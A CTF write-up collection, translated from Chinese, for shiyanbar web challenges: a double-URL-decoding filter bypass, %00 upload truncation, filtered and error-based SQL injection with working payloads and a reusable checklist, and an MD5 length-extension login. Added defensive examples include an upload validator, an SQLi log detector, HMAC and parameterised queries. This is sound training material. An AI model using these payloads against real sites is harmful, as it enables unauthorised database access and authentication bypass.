PHP大法 (PHP magic)
http://ctf5.shiyanbar.com/DUTCTF/index.php
Page:
Notice: Use of undefined constant id - assumed 'id' in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2
Notice: Undefined index: id in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2
Deprecated: Function eregi() is deprecated in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 2
Notice: Use of undefined constant id - assumed 'id' in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7
Notice: Use of undefined constant id - assumed 'id' in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7
Notice: Undefined index: id in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 7
Notice: Use of undefined constant id - assumed 'id' in C:\h43a1W3\phpstudy\WWW\DUTCTF\index.php on line 8
Can you authenticate to this website? index.php.txt
Opening index.php.txt:
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: *****************} </p>";
}
?>
<br><br>
Can you authenticate to this website?
eregi() searches the string for "hackerDJ" (case-insensitively) and prints "not allowed!" when it finds it.
The urldecode() call introduces a double-decoding flaw: the value is decoded a second time after the check.
So it is enough to submit a double-encoded string.
%25 decodes to %, which joins with the following 68 to form %68; the second decode turns that into h.
payload:http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%2568ackerDJ
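A model of the index.php logic above, added here as an example and not part of the challenge's own code. PHP has already URL-decoded the query string once when it fills $_GET, so eregi() sees the once-decoded value and the explicit urldecode() decodes it a second time; the hardened version runs the filter and the comparison on one canonical form of the input.

```python
import re
from urllib.parse import unquote

# Added example (not the challenge's code): a model of the index.php logic above.
# PHP already URL-decodes the query string once when it fills $_GET, so eregi()
# sees the once-decoded value and the explicit urldecode() decodes it a second
# time. The check and the comparison therefore look at two different strings.
BLOCKED = re.compile("hackerDJ", re.IGNORECASE)   # eregi() is case-insensitive

def vulnerable_check(raw_query_value: str) -> str:
    value = unquote(raw_query_value)              # what PHP stores in $_GET['id']
    if BLOCKED.search(value):
        return "not allowed"
    value = unquote(value)                        # the extra urldecode() call
    return "granted" if value == "hackerDJ" else "denied"

def canonicalize(raw_query_value: str, max_rounds: int = 5):
    # Decode until the value stops changing; give up (None) if it never settles
    value = unquote(raw_query_value)
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return None

def hardened_check(raw_query_value: str) -> str:
    # Run the filter and the comparison on one canonical form of the input
    value = canonicalize(raw_query_value)
    if value is None or BLOCKED.search(value):
        return "not allowed"
    return "granted" if value == "hackerDJ" else "denied"
```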
Upload bypass
http://ctf5.shiyanbar.com/web/upload
The page is a file upload form. Trying to upload a one-line PHP webshell (.php) gives the message that the file must be an image.
Uploading an image then gives the message that the extension must be .php.
There are four file-upload bypass methods: filename case bypass, special filename bypass, 0x00 truncation bypass, and the .htaccess file attack.
This challenge uses %00 truncation.
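A server-side upload filter that closes the four bypass classes listed above, added as an example; it is not the challenge's code, and the extension and magic-byte tables and the sample inputs are constructed.

```python
import secrets

# Added example, not the challenge's own code: a server-side upload filter that
# closes the four bypass classes listed above (case, special names, 0x00
# truncation, .htaccess). The tables and sample inputs are constructed.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
EXEC_EXT = {"php", "php3", "php5", "phtml", "phar", "htaccess", "htm", "html"}
IMAGE_MAGIC = {b"\xff\xd8\xff": {"jpg", "jpeg"}, b"\x89PNG\r\n\x1a\n": {"png"},
               b"GIF87a": {"gif"}, b"GIF89a": {"gif"}}

def validate_upload(filename: str, content: bytes) -> tuple:
    # 0x00 / %00 truncation: a NUL anywhere in the name is never legitimate
    if "\x00" in filename:
        return False, "null byte in filename"
    # Drop any directory part so ../ or absolute paths cannot choose the target
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = name.lower().split(".")
    # Special filenames: dotfiles (.htaccess) and names without an extension
    if parts[0] == "" or len(parts) < 2:
        return False, "dotfile or extensionless filename"
    # Case bypass (.PhP, .pHtml) is handled by lower(); reject executable
    # extensions anywhere in the chain, since Apache may honour shell.php.jpg
    if any(p in EXEC_EXT for p in parts[1:]):
        return False, "executable extension in filename"
    ext = parts[-1]
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed: " + ext
    # The bytes must match the declared type, not only the name
    for magic, kinds in IMAGE_MAGIC.items():
        if content.startswith(magic) and ext in kinds:
            break
    else:
        return False, "content does not match declared image type"
    # Never store under the client-chosen name; generate one ourselves
    return True, secrets.token_hex(8) + "." + ext
```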
Simple SQL injection
Hint: there is filtering.
http://ctf5.shiyanbar.com/423/web/
Source:
<html>
<head>
<title>1</title>
</head>
<body>
<div style="text-align:center">
<h2>flag<h2>
<h3>到底过滤了什么东西?<h3>
<form action="" method="get">
<input name="id" type="text"/>
<input type="submit" />
</form>
Looking at the page source shows the parameter is passed via GET.
id=1 returns name=baloteli
1' gives an error
Trying to query table columns: union select is filtered
With unionunion selectselect, the space is filtered
After a lot of trial and error: and, union, select, space, from and where are filtered, so each keyword in the query has to be written twice.
Use database() to see what is behind the id parameter:
1' unionunion selectselect database()'
web1 appears:
ID: 1' union select database()'
name: baloteli
ID: 1' union select database()'
name: web1
Next, the tables.
Query: 1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
Two relevant rows appear:
ID: 1' union select table_name from information_schema.tables where '1'='1
name: admin
ID: 1' union select table_name from information_schema.tables where '1'='1
name: flag
Then the column names: 1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag
ID: 1' union select column_name from information_schema.columns where table_name='flag
name: baloteli
ID: 1' union select column_name from information_schema.columns where table_name='flag
name: flag
ID: 1' union select column_name from information_schema.columns where table_name='flag
name: id
A flag column appears; finally, query flag directly:
1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
This gives the flag.
Simple SQL injection 2
Hint: the result is echoed back.
http://ctf5.shiyanbar.com/web/index_2.php
Following the approach of the previous challenge:
Entering 1, then 1', gives an error; 1 ' (with a space) echoes SQLi detected!
Spaces are filtered.
1' union select table_name from information_schema.tables where '1'='1
Replace spaces with /**/:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
The relevant rows:
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: admin
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: flag
ID: 1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
name: web_1
Next, the column names:
1' union select column_name from information_schema.columns where table_name='flag
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
The flag column:
ID: 1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
name: flag
Query flag:
1' union select flag from flag where '1'='1
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
This gives the flag.
Simple SQL injection 3
Hint: MySQL error-based injection.
http://ctf5.shiyanbar.com/web/index_3.php
Entering 1 shows Hello!
Entering 1' gives an error:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\h43a1W3\phpstudy\WWW\web\index_3.php on line 30
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
The error mentions the mysql_fetch_array() function.
Function definition:
mysql_fetch_array() fetches one row from the result set as an associative array, a numeric array, or both.
It returns an array built from the fetched row, or false when there are no more rows.
Ten MySQL error-based injection functions found online:
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
The first three all return Don't!, so try exp().
Dump the database name: 'or EXP(~(SELECT * from(select database())a))#
Output: DOUBLE value is out of range in 'exp(~((select 'web1' from dual)))'
Dump the table names: 'or EXP(~(SELECT * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
Output: DOUBLE value is out of range in 'exp(~((select 'flag,web_1' from dual)))'
Dump the column names: 'or EXP(~(SELECT * from(select group_concat(column_name) from information_schema.columns where table_name='flag')a))#
Output: DOUBLE value is out of range in 'exp(~((select 'flag,id' from dual)))'
Query the flag: 'or EXP(~(SELECT * from(select group_concat(flag) from flag)a))#
This gives the flag:
DOUBLE value is out of range in 'exp(~((select 'flag{Y0u_@r3_5O_dAmn_90Od}' from dual)))'
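A log-side detector for the three injection styles used in the write-ups above (doubled keywords, /**/ in place of spaces, and the error-based functions listed in the third challenge), added as an example and not part of the write-ups; the access-log lines are constructed samples in Apache combined format.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the write-ups: a log-side detector for the three
# injection styles used above (doubled keywords, /**/ in place of spaces, and
# the error-based functions listed in the third challenge). The access-log
# lines are constructed samples in Apache combined format.
LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /423/web/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /423/web/?id=1%27%20unionunion%20selectselect'
    '%20table_name%20fromfrom%20information_schema.tables%20wherewhere%20%271%27=%271 HTTP/1.1" 200 700',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /web/index_2.php?id=1%27/**/union/**/select'
    '/**/flag/**/from/**/flag/**/where/**/%271%27=%271 HTTP/1.1" 200 700',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /web/index_3.php?id=%27or%20EXP(~(SELECT%20*'
    '%20from(select%20database())a))%23 HTTP/1.1" 200 900',
]
RULES = {
    "union select": re.compile(r"union.{0,40}?select", re.I),
    "information_schema": re.compile(r"information_schema\.", re.I),
    "error-based function": re.compile(
        r"\b(extractvalue|updatexml|exp|floor|geometrycollection|multipoint|polygon|"
        r"multipolygon|linestring|multilinestring)\s*\(", re.I),
    "quoted tautology": re.compile(r"'\s*\d+\s*'\s*=\s*'\s*\d+"),
}

def normalise(query: str) -> str:
    # Undo the two evasions seen above: URL encoding and /**/ used as whitespace.
    # Keyword doubling needs no special handling: the doubled form still contains
    # the keyword, which is why reject-not-sanitise is the right policy.
    text = re.sub(r"/\*.*?\*/", " ", unquote_plus(query))
    return re.sub(r"\s+", " ", text)

def classify(log_line: str) -> list:
    # Returns the names of the rules the request's query string triggers
    m = re.search(r'"(?:GET|POST) (\S+)', log_line)
    if not m or "?" not in m.group(1):
        return []
    query = normalise(m.group(1).split("?", 1)[1])
    return [name for name, rule in RULES.items() if rule.search(query)]

def suspicious_lines(lines: list) -> list:
    return [line for line in lines if classify(line)]
```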
Let me in
Challenge text: I believe you can get what you want.
Hint: you may want to know what happens on the server side..
http://ctf5.shiyanbar.com/web/kzhan.php
The page source shows the parameters are passed via POST.
Submit any username and password, capture the request with Burp Suite, change source=1 in the cookie, and the source code comes back:
<html>
<body>
<pre>
$flag = "XXXXXXXXXXXXXXXXXXXXXXX";
$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security!
$username = $_POST["username"];
$password = $_POST["password"];
if (!empty($_COOKIE["getmein"])) {
if (urldecode($username) === "admin" && urldecode($password) != "admin") {
if ($COOKIE["getmein"] === md5($secret . urldecode($username . $password))) {
echo "Congratulations! You are a registered user.\n";
die ("The flag is ". $flag);
}
else {
die ("Your cookies don't match up! STOP HACKING THIS SITE.");
}
}
else {
die ("You are not an admin! LEAVE.");
}
}
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
if (empty($_COOKIE["source"])) {
setcookie("source", 0, time() + (60 * 60 * 24 * 7));
}
else {
if ($_COOKIE["source"] != 0) {
echo ""; // This source code is outputted here
}
}
</pre>
<h1>Admins Only!</h1>
<p>If you have the correct credentials, log in below. If not, please LEAVE.</p>
<form method="POST">
Username: <input type="text" name="username"> <br>
Password: <input type="password" name="password"> <br>
<button type="submit">Submit</button>
</form>
</body>
</html>
We need to construct a getmein value that satisfies
$COOKIE["getmein"] === md5($secret . urldecode($username . $password))
given that the server hands out
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
$secret is a 15-character string, so construct a string longer than 64 characters whose prefix is xxxxxxxxxxxxxxxadminadmin and obtain its hash.
Hash length extension attack.
This looks a bit easy!
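What the server side should have done instead, added here as an example rather than the challenge's code: the check above hashes md5($secret . $username . $password), so the leaked sample-hash is the MD5 state after the secret, which is what a length-extension attack builds on, and the plain concatenation also makes ("admin", "admin") and ("adminad", "min") the same input. The secret below is a constructed stand-in for the real $secret.

```python
import hashlib
import hmac

# Added example, not the challenge's code. Two changes close the weakness in the
# check above: HMAC, so the key is not simply prefixed to the message, and
# length-prefixed fields, so ("admin", "admin") and ("adminad", "min") are no
# longer the same input. SECRET is a constructed stand-in for the real $secret.
SECRET = b"constructed-stand-in-secret"

def encode_fields(*fields: str) -> bytes:
    # Length-prefix every field: unambiguous no matter what the values contain
    return b"".join(len(f.encode()).to_bytes(4, "big") + f.encode() for f in fields)

def make_token(secret: bytes, username: str, password: str) -> str:
    return hmac.new(secret, encode_fields(username, password), hashlib.sha256).hexdigest()

def verify_token(secret: bytes, username: str, password: str, token: str) -> bool:
    expected = make_token(secret, username, password)
    # Constant-time compare: a plain == would leak how much of the prefix matches
    return hmac.compare_digest(expected, token)

def naive_token(secret: bytes, username: str, password: str) -> str:
    # The challenge's construction, kept only to show the concatenation ambiguity
    return hashlib.md5(secret + (username + password).encode()).hexdigest()
```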
http://ctf5.shiyanbar.com/8/index.php?id=1
Entering 1' gives an error: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\h43a1W3\phpstudy\WWW\8\index.php on line 35
Then and 1=1 gives no error and and 1=2 returns an empty table, so injection is present.
order by 1,2 gives no error; 3 gives an error.
Query the database: and 1=2 union select 1,database()
Result: my_db
Query the database version: and 1=2 union select 1,version()
5.5.47
Next the tables: and 1=2 union select 1, table_name from information_schema.tables
Three relevant names appear: news, thiskey, admin
Query the columns: and 1=2 union select 1, column_name from information_schema.columns where table_schema='my_db' and table_name='thiskey'
Column: k0y
Then query the flag: and 1=2 union select 1, k0y from thiskey
Summary of the above
For challenges that hint at SQL injection:
- Check whether injection is present
and 1=1
and 1=2
- Query the database
and 1=2 union select 1,database()
- Query the database version
and 1=2 union select 1,version()
- Query the tables
and 1=2 union select 1, table_name from information_schema.tables
- Query the columns
and 1=2 union select 1, column_name from information_schema.columns where table_schema='' and table_name=''
- Query the flag
and 1=2 union select 1, from
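The string-built query behind the summary above beside the fixed version, added as an example and not the challenges' own code. An in-memory SQLite database stands in for the MySQL backend (so there is no information_schema here); a constructed news table and a thiskey table with a k0y column mirror the last write-up.

```python
import sqlite3

# Added example, not the challenges' own code. An in-memory SQLite database
# stands in for the MySQL backend, with constructed news and thiskey tables that
# mirror the last write-up. It contrasts the string-built query the summary
# above relies on with the same lookup using a bound parameter.
FLAG = "flag{constructed-sample}"

def open_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news(id INTEGER, title TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'hello')")
    db.execute("CREATE TABLE thiskey(id INTEGER, k0y TEXT)")
    db.execute("INSERT INTO thiskey VALUES (1, ?)", (FLAG,))
    return db

def news_concat(db: sqlite3.Connection, raw_id: str) -> list:
    # Vulnerable: the query text is assembled from the request value, which is
    # exactly the pattern behind index.php?id=1 and 1=2 union select ...
    sql = "SELECT id, title FROM news WHERE id=" + raw_id
    return [row[1] for row in db.execute(sql)]

def news_bound(db: sqlite3.Connection, raw_id: str) -> list:
    # Fixed: the value travels as data. SQLite sees a non-numeric string that
    # equals no integer id, so the union never becomes part of the statement.
    rows = db.execute("SELECT id, title FROM news WHERE id=?", (raw_id,))
    return [row[1] for row in rows]
```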
Reference material
In MySQL, Infobright and similar databases, the tables in the information_schema database are read-only: they cannot be updated, deleted from or inserted into, and cannot carry triggers, because they are really views rather than base tables and have no associated files.
information_schema.tables stores the metadata of the tables; the commonly used columns are:
table_schema: the database name;
table_name: the table name;
engine: the storage engine;
table_rows: a rough row-count estimate for the table;
data_length: the size of the table data (in bytes);
index_length: the size of the table's indexes;
row_format: shows whether the table is compressed;